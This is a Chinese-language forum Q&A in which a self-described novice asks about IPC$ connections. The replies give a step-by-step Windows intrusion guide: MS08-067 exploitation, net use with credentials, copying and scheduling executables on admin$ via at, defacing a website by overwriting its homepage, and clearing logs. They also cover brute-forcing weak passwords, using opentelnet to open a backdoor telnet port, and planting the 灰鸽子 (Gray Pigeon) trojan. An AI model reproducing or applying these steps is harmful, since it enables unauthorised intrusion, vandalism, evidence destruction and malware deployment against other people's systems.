当别人的电脑开启防火墙时，能不能和他建立IPC$连接？还有就是是不是只能与局域网内的电脑建立IPC$连接？

本人菜鸟，有很多问题都不懂，麻烦详细点哈，谢谢。

ipc$和其他的共享被关闭或没开，不可以进入了，可以是ms08067溢出入侵，前提是对方机器，没有打补丁过者指定的服务打开才可以Server、Workstation、Computer Browser这三个服务!

SMB Connect OK!
Send Payload Over!

出现上面的提示就成功了!

首先先告诉你ipc$的命令格式: net use \\对方ip\ipc$ "密码"user:"用户名" || 建立远程连接 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 net time \\对方ip\ || 看看对方的本地时间 at \\对方ip\启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序 telnet 对方ip 端口 我们也可以改网页： net use \\ip\ipc$ "admin"uesr:"admin" 回车。 出现“命令成功完成”。 然后输入“dir \\ip\c$\*.*” 看到c:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面 输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了，假如你黑页在c:下，就输入"copy 主页文件 \\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了，简单吧？ 日志清除，断开连接 ： 我们copy cl.exe ，clear.exe 上去，再执行，就可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use \\ip\ipc$ \delete 用x-scan或者流光扫他的端口,猜解弱口令,碰到3389用暴力破戒器,1433用综合利用工具,sql注入,必须开启了1433端口,ipc$入侵很多时候没有权限的,可以利用openntelnet开他的telnet.命令格式是opentelnet"ip" 协议"端口",你可以用administrator密码空建立空连接,然后用opentelnet这个工具比如我想开ip为42.25.65.32的23端口,就是telnet啦,命令格式为opentelnet.exe 42.25.65.32 1 99,过两分钟后登陆,运行,cmd,telnet 42.25.65.32 99 ,因为你上面开的是99端口,所以就是99,登上去后你想怎么样就随便你了,拷个灰鸽子什么的:))))